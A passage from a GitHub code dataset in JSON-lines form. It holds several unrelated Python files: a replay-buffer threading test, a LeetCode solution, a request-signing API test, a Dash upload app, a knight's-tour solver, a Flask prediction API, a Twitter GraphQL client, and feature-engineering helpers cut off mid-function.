ReplayBuffer object.\n Params\n ======\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n \"\"\"\n self.id = id\n self.batch_size = batch_size\n self.memory = deque(maxlen=buffer_size) # internal memory (deque)\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(seed)\n self.step_lock = Lock()\n self.sample_lock = Lock()\n self.sample_lock.acquire() # allow save_step first\n\n def step(self, state, action, reward, next_state, done):\n \"\"\"Add a new experience to memory.\"\"\"\n self.step_lock.acquire()\n\n print(\"save_step\")\n\n self.sample_lock.release()\n\n def sample(self):\n \"\"\"Randomly sample a batch of experiences from memory.\"\"\"\n\n self.sample_lock.acquire()\n\n print(\"sample\")\n\n self.step_lock.release()\n\n def get_id(self):\n return self.id\n\n def get_size(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory)\n\n def status(self):\n print(\"len of memory\", len(self.memory), \"max size of memory\", self.memory.maxlen)\n\n\n test_memory = TestReplayMemory(id=1, batch_size=5, buffer_size=5, seed=0)\n\n\n def step():\n while True:\n i = 1\n test_memory.step(1, 1, 1, 1, 1)\n # print(\"save_step\")\n\n\n def sample():\n while True:\n i = 1\n test_memory.sample()\n # print(\"sample\")\n\n\n from threading import Thread\n\n Thread_a = Thread(None, step)\n Thread_b = Thread(None, sample)\n\n Thread_a.start()\n Thread_b.start()\n","repo_name":"zhouyou-gu/drl-5g-scheduler","sub_path":"controller_src/sim_src/replay_memory/replay_memory.py","file_name":"replay_memory.py","file_ext":"py","file_size_in_byte":6792,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"73503858988","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport copy\r\nimport os\r\nimport sys\r\n\r\nfrom common.common import TreeNode, buildTestTree\r\n\r\nproject_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\r\nsys.path.insert(0, project_dir)\r\n\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution(object):\r\n def tree2str(self, t):\r\n \"\"\"\r\n :type t: TreeNode\r\n :rtype: str\r\n \"\"\"\r\n if not t:\r\n return \"\"\r\n\r\n if not t.left and not t.right:\r\n return str(t.val)\r\n\r\n if not t.left:\r\n return str(t.val) + \"()(\" + self.tree2str(t.right) + \")\"\r\n\r\n if not t.right:\r\n return str(t.val) + \"(\" + self.tree2str(t.left) + \")\"\r\n\r\n return str(t.val) + \"(\" + self.tree2str(t.left) + \")(\" + self.tree2str(t.right) + \")\"\r\n\r\n def tree2strIter(self, t):\r\n if not t:\r\n return \"\"\r\n\r\n res = \"\"\r\n layer = [t]\r\n while layer:\r\n ele = layer.pop(0)\r\n if ele == \")\":\r\n res += ele\r\n else:\r\n res += \"(\" + str(ele.val)\r\n if not ele.left and ele.right:\r\n res += \"()\"\r\n if ele.right:\r\n layer = [ele.right, \")\"] + layer\r\n if ele.left:\r\n layer = [ele.left, \")\"] + layer\r\n\r\n return res[1:]\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n","repo_name":"cqxmzhc/my_leetcode_solutions","sub_path":"606-ConstructStringfromBinaryTree/ConstructStringfromBinaryTree.py","file_name":"ConstructStringfromBinaryTree.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37460561532","text":"# -*- coding=utf-8 -*-\n# @Time : 2022/10/30 11:59\n# @Author : ╰☆H.俠ゞ\n# =============================================================\nimport random\nimport time\n\nimport jsonpath\nimport requests\nfrom utils import get_md5\nhost = r'http://82.156.74.26:9088/'\n\n\ndef demo_get():\n res = requests.get(\"/pinter/com/getSku?id=1\")\n print(res.json())\n\n\ndef demo_random_tel():\n url = host + \"/pinter/com/userInfo\"\n header = {\n 'Content-Type': 'application/json'\n }\n json = {\"phoneNum\": \"123434\", \"optCode\": \"testfan\", \"timestamp\": \"1667103266\", \"sign\": \"your sign data\"}\n first_three_num = [\"157\", \"158\", \"189\", \"136\", \"137\", \"173\", \"188\"]\n # choice() 从可迭代对象中取一个;sample()是取指定个数\n telephone = random.choice(first_three_num) + str(random.randint(10000000, 99999999))\n print(telephone)\n timestamp = round(time.time()*1000)\n toSign = f'{telephone}testfan{timestamp}'\n sign = get_md5(toSign)\n json[\"phoneNum\"] = telephone\n json[\"timestamp\"] = timestamp\n json[\"sign\"] = sign\n print(json)\n res = requests.post(url=url, json=json, headers=header)\n print(res.json()[\"data\"]['id']) # json取值\n data = jsonpath.jsonpath(res.json(), '$..data.id')[0] # jsonpath取值\n print(data)\n\n\nif __name__ == \"__main__\":\n demo_random_tel()","repo_name":"superlff888/projectScripts","sub_path":"MStudent/autoTest_banXia/阶段一:python高级编程/正则/api_re.py","file_name":"api_re.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20440573762","text":"import base64\nimport datetime\nimport io\n\nimport dash\nimport plotly.express as px\nfrom dash.dependencies import Input, Output, State\nfrom dash import dcc, html, dash_table\n\nimport pandas as pd\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, suppress_callback_exceptions=True)\n\napp.layout = html.Div([\n dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Drag and Drop or ',\n html.A('Select Files')\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n # Allow multiple files to be uploaded\n multiple=True\n ),\n html.Div(id='output-data-upload', children=[]),\n html.Div(id='show-plottypes'),\n # html.Button(id='submit-button', children='Create Graph'),\n html.Div(id='output-div')\n])\n\ndef parse_contents(contents, filename, date):\n content_type, content_string = contents.split(',')\n\n decoded = base64.b64decode(content_string)\n try:\n if 'csv' in filename:\n # Assume that the user uploaded a CSV file\n df = pd.read_csv(\n io.StringIO(decoded.decode('utf-8')))\n elif 'xls' in filename:\n # Assume that the user uploaded an excel file\n df = pd.read_excel(io.BytesIO(decoded))\n except Exception as e:\n print(e)\n return html.Div([\n 'There was an error processing this file.'\n ])\n\n return html.Div([\n html.H5(filename),\n html.H6(datetime.datetime.fromtimestamp(date)),\n\n # dash_table.DataTable(\n # df.to_dict('records'),\n # [{'name': i, 'id': i} for i in df.columns]\n # ),\n dcc.Store(id='stored-data', data=df.to_dict('records')),\n dcc.RadioItems(id='plottype',options=['line', 'bar'], value='line'), \n\n html.Hr(), # horizontal line\n\n # For debugging, display the raw contents provided by the web browser\n html.Div('Raw Content'),\n html.Pre(contents[0:200] + '...', style={\n 'whiteSpace': 'pre-wrap',\n 'wordBreak': 'break-all'\n })\n ])\n\n@app.callback(Output('output-data-upload', 'children'),\n Input('upload-data', 'contents'),\n State('upload-data', 'filename'),\n State('upload-data', 'last_modified'),\n State('output-data-upload', 'children'))\ndef update_output(list_of_contents, list_of_names, list_of_dates, odu):\n\n if list_of_contents is not None:\n children = [\n parse_contents(c, n, d) for c, n, d in\n zip(list_of_contents, list_of_names, list_of_dates)]\n odu = [children]\n print(odu)\n return children\n\n\n@app.callback(\n Output('show-plottypes', 'children'),\n Input('plottype', 'value'),\n State('stored-data', 'data')\n # State('xaxis-data', 'value'),\n # State('yaxis-data', 'value')\n)\ndef show_columns(plot_selected, data):\n # df = pd.DataFrame(data)\n print(plot_selected)\n return html.Div([\n html.P(\"Insert X axis data\"),\n dcc.Dropdown(id='xaxis-data',\n options=[{'label':x, 'value':x} for x in list(data[0].keys())]),\n html.P(\"Insert Y axis data\"),\n dcc.Dropdown(id='yaxis-data',\n options=[{'label':x, 'value':x} for x in list(data[0].keys())]),\n html.Button(id='submit-button', children='Create Graph')\n ])\n\n\n# @app.callback(Output('output-div', 'children'),\n# Input('submit-button','n_clicks'),\n# Input('plottype ', 'value'),\n# State('stored-data','data'),\n# State('xaxis-data','value'),\n# State('yaxis-data', 'value'))\n# def make_graphs(n, plottype, data, x_data, y_data):\n# print(plottype)\n# if n is None:\n# return dash.no_update\n# elif 'bar' in plottype.lower():\n# bar_fig = px.bar(data, x=x_data, y=y_data)\n# return dcc.Graph(figure=bar_fig)\n# elif 'line' in plottype.lower():\n# line_fig = px.line(data, x=x_data, y=y_data)\n# return dcc.Graph(figure=line_fig)\n# elif 'hist' in plottype.lower():\n# line_fig = px.histogram(data, x=x_data)\n# return dcc.Graph(figure=line_fig)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"ProgressingMann/Dash","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6916456191","text":"import glob\r\nimport json\r\nimport tkinter as tk\r\nimport tk_func\r\nfrom functools import partial\r\n\r\ngoogle_files = glob.glob(\"google_json/*.json\")\r\nspreadsheet_files = glob.glob(\"spreadsheet_json/*.json\")\r\nwith open(google_files[0],\"r\") as f:\r\n gj_obj = json.load(f) # service\r\nwith open(spreadsheet_files[0],\"r\") as f:\r\n sj_obj = json.load(f)\r\n\r\n\r\ndef ok(ui,sj_obj):\r\n with open(spreadsheet_files[0],\"w\") as f:\r\n sj_obj[\"sheet_url\"] = f\"{ui.get_sheetbox()}\"\r\n sj_obj[\"custom_verifyFp\"] = f\"{ui.get_verify_addr()}\"\r\n sj_obj[\"interval\"] = f\"{ui.get_interval()}\"\r\n json.dump(sj_obj,f)\r\n ui.root.quit()\r\ndef cancel(ui):\r\n ui.root.quit()\r\n\r\n# gj_obj['client_email']\r\n# sj_obj.get(\"sheet_url\")\r\nui = tk_func.UI(gj_obj,sj_obj)\r\nui.set_okbutton(partial(ok,ui,sj_obj))\r\nui.set_cancelbutton(partial(cancel,ui))\r\nui.start()\r\n","repo_name":"yuyund/TikTokScraping","sub_path":"code/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30130168956","text":"import random \n\nwhile True:\n num_aleatorio = random.randint(1, 9)\n\n resposta = input(\"Adivinhe o número (1-9) ou digite 'sair' para encerrar o jogo: \")\n \n if resposta == \"sair\":\n print(\"Obrigado por jogar!\")\n break\n \n if int(resposta) == num_aleatorio:\n print(\"Parabéns! Você acertou o número.\")\n elif int(resposta) < num_aleatorio:\n print(\"Tente novamente! O número é maior.\")\n else:\n print(\"Tente novamente! O número é menor.\")\n","repo_name":"master-1000/exploring-AI","sub_path":"src/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6498860653","text":"###########################\n# STAMPS SCRIPT\n# version 1.0.0\n# 28 April 2022\n# damienengland.com.au\n###########################\n\n# Import Modules\nimport nuke\nimport random\n\n\n# CREATE CHILD NODE\ndef create_stamp(parent):\n\n parent_name = parent.knob('name').value()\n p_xpos = parent.xpos()\n p_ypos = parent.ypos()\n\n stamp_name = f\"{parent_name}_{random.randint(0,100000)}\"\n\n stamp = nuke.createNode('NoOp', inpanel=False)\n stamp['tile_color'].setValue(0x20101ff)\n stamp.setInput(0, nuke.toNode(parent_name))\n stamp['hide_input'].setValue(True)\n stamp['xpos'].setValue(p_xpos)\n stamp['ypos'].setValue(p_ypos + 50)\n stamp['name'].setValue(stamp_name)\n stamp['label'].setValue(\"test\")\n\n stamp_tab = nuke.Tab_Knob('stamp', 'Stamp')\n stamp.addKnob(stamp_tab)\n parent_id = nuke.String_Knob('parent_id', 'Parent ID', parent_name)\n st_divider = nuke.Text_Knob(\"divider\", \"\")\n stamp.addKnob(parent_id)\n stamp.addKnob(st_divider)\n\n auto_label = \"nuke.thisNode().knob('parent_id').value()\"\n stamp['autolabel'].setValue(auto_label)\n\n # ADD STAMP TO PARENT STAMP LIST\n current_stamp_list = parent.knob(\"stamp_list\").value()\n new_stamp_list = current_stamp_list + f\"{stamp.knob('name').value()}\\n\"\n parent.knob(\"stamp_list\").setValue(new_stamp_list)\n\n # CONNECT CHILD TO PARENT IF DISCONNECTED\n RECONNECT = \"reconnect_parent(nuke.thisNode())\"\n reconnect_btn = nuke.PyScript_Knob('reconnect', 'Reconnect', RECONNECT)\n reconnect_btn.setFlag(nuke.STARTLINE)\n stamp.addKnob(reconnect_btn)\n\n\ndef reconnect_all_stamps(parent):\n stamps = parent.knob(\"stamp_list\").value()\n stamp_list = stamps.replace(\"\\n\", \".\").split(\".\")[:-1:]\n\n new_list = \"\"\n for stamp in stamp_list:\n node = nuke.toNode(stamp)\n if node is not None:\n new_list += f\"{stamp}\\n\"\n reconnect_parent(node)\n node.setSelected(True)\n\n parent.knob(\"stamp_list\").setValue(new_list)\n\n\n# SELECT ALL STAMPS FROM LIST\ndef select_stamps(parent):\n stamps = parent.knob(\"stamp_list\").value()\n stamp_list = stamps.replace(\"\\n\", \".\").split(\".\")[:-1:]\n for stamp in stamp_list:\n nuke.toNode(stamp).setSelected(True)\n\n\n# CONNECT CHILD TO PARENT\ndef reconnect_parent(stamp):\n\n parent_name = stamp['parent_id'].value()\n parent_node = nuke.toNode(parent_name)\n\n if parent_node is None:\n nuke.message('ERROR: Unable to locate parent!')\n return\n\n stamp.setInput(0, parent_node)\n\n\n# UPDATE PARENT LABEL\ndef update_label(node):\n node[\"name\"].setValue(node[\"parent_label\"].value())\n\n\n# MAIN TOOL FUNCTION\ndef create_parent():\n\n # CREATE PARENT\n txt = nuke.getInput('Stamp Title')\n if txt is None:\n return\n else:\n p_label = txt\n\n parent = nuke.createNode('NoOp')\n parent['name'].setValue(p_label)\n\n # PARENT TAB KNOBS AND BUTTONS\n parent_tab = nuke.Tab_Knob('stamp_parent', 'Stamp Parent')\n parent.addKnob(parent_tab)\n parent_label_string_knob = nuke.String_Knob('parent_label', 'Title:', p_label)\n parent.addKnob(parent_label_string_knob)\n\n # UPDATE LABEL\n UPDATE_LABEL_PYSCRIPT = \"update_label(nuke.thisNode())\"\n p_update_label = nuke.PyScript_Knob('update_label', 'Update Label', UPDATE_LABEL_PYSCRIPT)\n parent.addKnob(p_update_label)\n\n # DIVIDER\n p_divider = nuke.Text_Knob(\"divider\", \"\")\n parent.addKnob(p_divider)\n\n # DESCRIPTOR\n p_descriptor = nuke.Text_Knob(\"\", \"Stamps:\", \" \")\n parent.addKnob(p_descriptor)\n\n # CREATE STAMP\n CREATE_STAMP_PYSCRIPT = \"create_stamp(nuke.thisNode())\"\n p_create_stamp_btn = nuke.PyScript_Knob('create_stamp', 'Create Stamp', CREATE_STAMP_PYSCRIPT)\n parent.addKnob(p_create_stamp_btn)\n\n # SELECT STAMPS\n SELECT_STAMPS_PYSCRIPT = \"select_stamps(nuke.thisNode())\"\n p_select_stamps_btn = nuke.PyScript_Knob(\"select_stamps\", \"Select Stamps\", SELECT_STAMPS_PYSCRIPT)\n parent.addKnob(p_select_stamps_btn)\n\n # STAMPS LIST TAB\n stamp_list_tab = nuke.Tab_Knob(\"stamps\", \"Stamps\")\n parent.addKnob(stamp_list_tab)\n stamp_list_knob = nuke.Multiline_Eval_String_Knob('stamp_list', 'Stamp Nodes', '')\n parent.addKnob(stamp_list_knob)\n\n # UPDATE STAMPS FROM LIST\n RECONNECT_ALL_STAMPS_PYSCRIPT = \"reconnect_all_stamps(nuke.thisNode())\"\n\n update_stamp_list_btn = nuke.PyScript_Knob('reconnect_all_stamps', 'Reconnect Stamps', RECONNECT_ALL_STAMPS_PYSCRIPT)\n update_stamp_list_btn.setFlag(nuke.STARTLINE)\n parent.addKnob(update_stamp_list_btn)\n\n # SET DEFAULT TAB\n parent.knob(\"stamp_parent\").setFlag(0)\n\n","repo_name":"Damiengland/stamps-nuke","sub_path":"stamps_main.py","file_name":"stamps_main.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7884834737","text":"\ndef solveKTUtil(x, y, moves, soln):\n def printSolution(soln):\n for x in range(len(soln)):\n for y in range(len(soln)):\n print(soln[x][y])\n\n def isSafe(x, y, soln):\n if (x >= 0 and x < 8) and (y >= 0 and y < 8) and soln[x][y] == -1:\n return True\n else:\n return False\n\n print(moves)\n if moves == 8 * 8:\n printSolution(soln)\n return True\n\n dx = [1, 2, -1, -2, -1, -2, 1, 2]\n dy = [2, 1, 2, 1, -2, -1, -2, -1]\n\n for k in range(len(dx)):\n mx = x + dx[k]\n my = y + dy[k]\n\n if isSafe(mx, my, soln):\n soln[mx][my] = moves\n if solveKTUtil(mx, my, moves + 1, soln):\n return True\n\n soln[mx][my] = -1\n return False\n\ndef solveKT():\n moves = 1\n x = 0\n y = 0\n soln = [[-1 for _ in range(8)] for _ in range(8)]\n soln[0][0] = 0\n solveKTUtil(x, y, moves, soln)\n\nif __name__ == \"__main__\":\n solveKT()\n\n\n","repo_name":"pkrishn6/problems","sub_path":"api/knightTour.py","file_name":"knightTour.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30965903700","text":"from flask import Flask, jsonify, request\nimport pandas as pd\nimport numpy as np\nimport json\nfrom my_model.predict import make_prediction\n\napp = Flask(__name__)\n\n@app.route('/wine', methods=['POST'])\ndef wine():\n data = request.get_json()\n X = data['data']\n columns_model = ['alcohol', 'fixed acidity', 'volatile acidity',\n 'citric acid', 'residual sugar', 'chlorides',\n 'free sulfur dioxide', 'total sulfur dioxide', \n 'density', 'pH', 'sulphates']\n # Simplificamos las columnas a 3 para el testing \n selected_data = {column: X.get(column, 0) for column in columns_model}\n \n selected_df = pd.DataFrame([selected_data])\n \n prediction = make_prediction(input_data=selected_df)\n prediction = prediction['predictions'][0]\n if prediction == 1:\n prediction = \"bad\"\n else:\n prediction = \"good\"\n return jsonify(prediction), 200\n\nif __name__ == '__main__':\n app.run(debug=True,host=\"0.0.0.0\", port=int(\"5000\"))","repo_name":"xabimich/PEC2_aesc","sub_path":"APIFlask/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42397435300","text":"import json\nimport logging\nimport typing\n\nfrom . import (\n RedGalaxyException,\n global_instance,\n SessionManager,\n HighGravity,\n User,\n UtilBox,\n UploadMedia,\n Tweet,\n)\n\n\nclass TwitterUser:\n def __init__(self, sessionInstance: SessionManager = None):\n \"\"\"\n Routes relating to getting tweets and users.\n\n :param sessionInstance:\n \"\"\"\n if sessionInstance is None:\n sessionInstance = global_instance\n self.session = sessionInstance\n self.gravity = HighGravity(self.session)\n self._routes = []\n self.logging = logging.getLogger(\"TwitterUser\")\n # I'm not sure if we are going to use a custom bearer in the future...\n self.bearer = \"\"\n\n getUserFeatures = {\n \"responsive_web_twitter_blue_verified_badge_is_enabled\": True,\n \"verified_phone_label_enabled\": True,\n \"responsive_web_graphql_timeline_navigation_enabled\": True,\n \"responsive_web_graphql_skip_user_profile_image_extensions_enabled\": False,\n \"responsive_web_graphql_exclude_directive_enabled\": False,\n \"blue_business_profile_image_shape_enabled\": True,\n \"highlights_tweets_tab_ui_enabled\": True,\n \"creator_subscriptions_tweet_preview_api_enabled\": True,\n }\n\n @property\n async def routes(self):\n if not self._routes:\n self._routes = await self.gravity.retrieve_routes()\n return self._routes\n\n async def get_user(self, username: typing.Union[str, User]):\n \"\"\"\n Retrieves a User by its username/screenname.\n :param username: The user's username. (e.g. Twitter)\n :return: A User object containing the user's information.\n \"\"\"\n routes = await self.routes\n\n if isinstance(username, User):\n username = username.username\n if username is None:\n raise Exception(\"Malformed User data? Expected username to exist.\")\n\n variables = {\n \"screen_name\": username,\n \"withSafetyModeUserFields\": False,\n \"withSuperFollowsUserFields\": True,\n }\n route = routes.get(\"UserByScreenName\")\n if not route:\n print(\"Routes list:\")\n print(routes)\n raise Exception(\"Missing routes?\")\n url = route[0]\n\n # Twitter raises an error if we have a missing feature not present in the list.\n # We could just look at the defaults but at the same time,\n # it would be better to not follow blindly.\n set_features = list(self.getUserFeatures.keys())\n for feature in route[1][\"featureSwitches\"]:\n if feature not in set_features:\n self.logging.warning(\n f\"!! {feature} found in featureSwitch but missing in setFeatures.\"\n )\n a = await self.session.get(\n url,\n params={\n \"variables\": json.dumps(variables).replace(\" \", \"\"),\n \"features\": json.dumps(self.getUserFeatures).replace(\" \", \"\"),\n },\n )\n if a.status_code != 200:\n self.logging.debug(a.content)\n raise RedGalaxyException(f\"Expected 200. Got {a.status_code}\")\n # print(a)\n data: dict = a.json()\n true_user = data[\"data\"][\"user\"][\"result\"][\"legacy\"]\n true_user[\"id\"] = data[\"data\"][\"user\"][\"result\"][\"rest_id\"]\n return UtilBox.make_user(true_user)\n\n getUserIdFeatures = {\n \"responsive_web_twitter_blue_verified_badge_is_enabled\": True,\n \"responsive_web_graphql_exclude_directive_enabled\": True,\n \"verified_phone_label_enabled\": False,\n \"responsive_web_graphql_skip_user_profile_image_extensions_enabled\": False,\n \"responsive_web_graphql_timeline_navigation_enabled\": True,\n }\n\n async def get_user_by_id(\n self, *users: typing.Union[int, User]\n ) -> typing.Optional[User]:\n user_id_str = []\n for user_id in users:\n uid = None\n if isinstance(user_id, User):\n if user_id.id is None:\n raise Exception(\"Malformed User data? Expected username to exist.\")\n elif isinstance(user_id, int):\n uid = user_id\n elif isinstance(user_id, str):\n uid = int(user_id) # Test for an integer.\n else:\n raise Exception(f\"{user_id} is not a int or User object.\")\n\n user_id_str.append(str(uid))\n routes = await self.routes\n\n variables = {\n \"userIds\": user_id_str,\n \"withSafetyModeUserFields\": False,\n }\n\n route = routes.get(\"UsersByRestIds\")\n if not route:\n print(\"Routes list:\")\n print(routes)\n raise Exception(\"Missing routes?\")\n url = route[0]\n\n # Twitter raises an error if we have a missing feature not present in the list.\n # We could just look at the defaults but at the same time,\n # it would be better to not follow blindly.\n features = self.getUserIdFeatures\n set_features = list(features.keys())\n for feature in route[1][\"featureSwitches\"]:\n if feature not in set_features:\n self.logging.warning(\n f\"{feature} found in featureSwitch but missing in setFeatures.\"\n )\n await self.session.guest_token()\n replaced = url.replace(\"https://api.twitter.com/\", \"https://twitter.com/i/api/\")\n\n a = await self.session.get(\n replaced,\n params={\n \"variables\": json.dumps(variables).replace(\" \", \"\"),\n \"features\": json.dumps(features).replace(\" \", \"\"),\n },\n guest_token=True,\n )\n\n data: dict = a.json()\n inner_data: dict = data.get(\"data\", {})\n if inner_data:\n if len(user_id_str) == 1:\n inner_data[\"users\"][0][\"result\"][\"legacy\"][\"id\"] = user_id_str[0]\n return UtilBox.make_user(inner_data[\"users\"][0][\"result\"][\"legacy\"])\n else:\n users = []\n for idx, user in enumerate(inner_data[\"users\"]):\n if user:\n user[\"result\"][\"legacy\"][\"id\"] = user_id_str[idx]\n user = UtilBox.make_user(user[\"result\"][\"legacy\"])\n users.append(user)\n else:\n users.append(None)\n return users\n\n return None\n\n getTweetFeatures = {\n \"responsive_web_twitter_blue_verified_badge_is_enabled\": True,\n \"responsive_web_graphql_exclude_directive_enabled\": False,\n \"verified_phone_label_enabled\": False,\n \"responsive_web_graphql_timeline_navigation_enabled\": True,\n \"responsive_web_graphql_skip_user_profile_image_extensions_enabled\": False,\n \"longform_notetweets_consumption_enabled\": True,\n \"tweetypie_unmention_optimization_enabled\": True,\n \"vibe_api_enabled\": True,\n \"responsive_web_edit_tweet_api_enabled\": True,\n \"graphql_is_translatable_rweb_tweet_is_translatable_enabled\": True,\n \"view_counts_everywhere_api_enabled\": True,\n \"freedom_of_speech_not_reach_appeal_label_enabled\": False,\n \"standardized_nudges_misinfo\": True,\n \"tweet_with_visibility_results_prefer_gql_limited_actions_policy_enabled\": False,\n \"interactive_text_enabled\": True,\n \"responsive_web_text_conversations_enabled\": False,\n \"responsive_web_enhance_cards_enabled\": False,\n }\n\n async def get_tweet(self, tweet_id: int) -> typing.Optional[Tweet]:\n \"\"\"\n Get a tweet by its snowflake/tweet_id\n :param tweet_id: The tweet ID as an integer. E.G (1564598913784549376).\n :return: a Tweet Object. May return None if the tweet has been deleted or doesn't exist.\n \"\"\"\n routes = await self.routes\n\n variables = {\n \"focalTweetId\": str(tweet_id),\n \"with_rux_injections\": False,\n \"includePromotedContent\": True,\n \"withCommunity\": True,\n \"withQuickPromoteEligibilityTweetFields\": True,\n \"withBirdwatchNotes\": True,\n \"withSuperFollowsUserFields\": True,\n \"withDownvotePerspective\": False,\n \"withReactionsMetadata\": False,\n \"withReactionsPerspective\": False,\n \"withSuperFollowsTweetFields\": True,\n \"withVoice\": True,\n \"withV2Timeline\": True,\n }\n\n route = routes.get(\"TweetDetail\")\n if not route:\n print(\"Routes list:\")\n print(routes)\n raise Exception(\"Missing routes?\")\n url = route[0]\n\n # Twitter raises an error if we have a missing feature not present in the list.\n # We could just look at the defaults but at the same time,\n # it would be better to not follow blindly.\n features = self.getTweetFeatures\n set_features = list(features.keys())\n for feature in route[1][\"featureSwitches\"]:\n if feature not in set_features:\n self.logging.warning(\n f\"{feature} found in featureSwitch but missing in setFeatures.\"\n )\n await self.session.ensure_token()\n replaced = url.replace(\"https://api.twitter.com/\", \"https://twitter.com/i/api/\")\n a = await self.session.get(\n replaced,\n params={\n \"variables\": json.dumps(variables).replace(\" \", \"\"),\n \"features\": json.dumps(features).replace(\" \", \"\"),\n },\n guest_token=True,\n )\n data: dict = a.json()\n inner_data: dict = data.get(\"data\", {})\n for instruction in inner_data[\"threaded_conversation_with_injections_v2\"].get(\n \"instructions\"\n ):\n type_instruct = instruction[\"type\"]\n if type_instruct == \"TimelineAddEntries\":\n for entry in instruction[\"entries\"]:\n if entry[\"entryId\"].startswith(\"tweet-\"):\n base_tweet = entry[\"content\"][\"itemContent\"][\"tweet_results\"][\n \"result\"\n ]\n return UtilBox.common_tweet(base_tweet, None)\n","repo_name":"Ristellise/RedGalaxy","sub_path":"RedGalaxy/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"6362006904","text":"\"\"\"\nCreated on 2021.4.9 10:32\n\"\"\"\nimport gc\nimport numpy as np\nimport random\nfrom sklearn.preprocessing import OneHotEncoder\n# from feature_engineering.global_params import feature_eng_bins_dict,feature_eng_combine_dict,feature_normalization_dict\nfrom feature_engineering.utils import replace_abnormal\nfrom feature_engineering.utils import ff,categories_to_int,calculate_chi2\nfrom collections import Counter\n\n\n#\ndef sqrt(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n # sqrt_col = np.sqrt(np.array(col))\n sqrt_col = [np.sqrt(x) if x>=0 else -np.sqrt(np.abs(x)) for x in col]\n sqrt_col = np.array(sqrt_col).reshape(len(sqrt_col),1)\n return sqrt_col\n except:\n raise ValueError('Value type error,check feature type')\n\ndef inverse_old(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n try:\n col = np.array(col)\n\n replace_col = np.array([float(np.where(x == 0., random.choice([1e-5,-1e-5]), x)) for x in col])\n new_col = replace_abnormal(1/replace_col)\n return new_col.reshape(len(new_col),1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef inverse(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n try:\n col = np.array(col) \n # replace_num = np.mean(1 / np.array(list(filter(lambda x: x!=0 ,col ))) )\n new_col = np.array([1/x if x!=0 else 0 for x in col])\n\n return new_col.reshape(len(new_col),1)\n except:\n raise ValueError('Value type error,check feature type')\n\n\ndef log(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n log_col = [np.log(np.abs(x)) if x!=0 else 0 for x in col]\n log_col = np.array(log_col).reshape(len(log_col),1)\n \n return log_col\n except:\n raise ValueError('Value type error,check feature type')\n \n\n\"\"\"\ndef normalization(col,col_index):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n # Feature z-core standardization\n # try:\n col = np.array(col)\n if col_index in feature_normalization_dict:\n mean,sigma = feature_normalization_dict[col_index]\n else:\n mean = np.mean(col)\n sigma = np.std(col)\n feature_normalization_dict[col_index] = (mean,sigma)\n new_col = []\n for x in col:\n scaled_x = (x-mean)/sigma\n new_col.append(scaled_x)\n return np.array(new_col).reshape(len(new_col),1)\n # except:\n # raise ValueError('Value type error,check feature type')\n\n\n # try:\n # scaled_col = preprocessing.scale(np.array(col))\n # return scaled_col.reshape(len(scaled_col),1)\n # except:\n # raise ValueError('Value type error,check feature type')\n\n\ndef max_min_old(col,col_index):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n # feature min_max normalization, multiple columns need to be considered\n\n col = np.array(col)\n if col_index in feature_normalization_dict:\n max,min = feature_normalization_dict[col_index]\n # print(col_index)\n else:\n max = np.max(col)\n min = np.min(col)\n feature_normalization_dict[col_index] = (max,min)\n new_col = []\n for x in col:\n x_scaled = float((x - min) / (max - min))\n new_col.append(x_scaled)\n # print(x_scaled)\n return np.array(new_col)\n\"\"\"\ndef max_min(col,col_op):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n\n col = 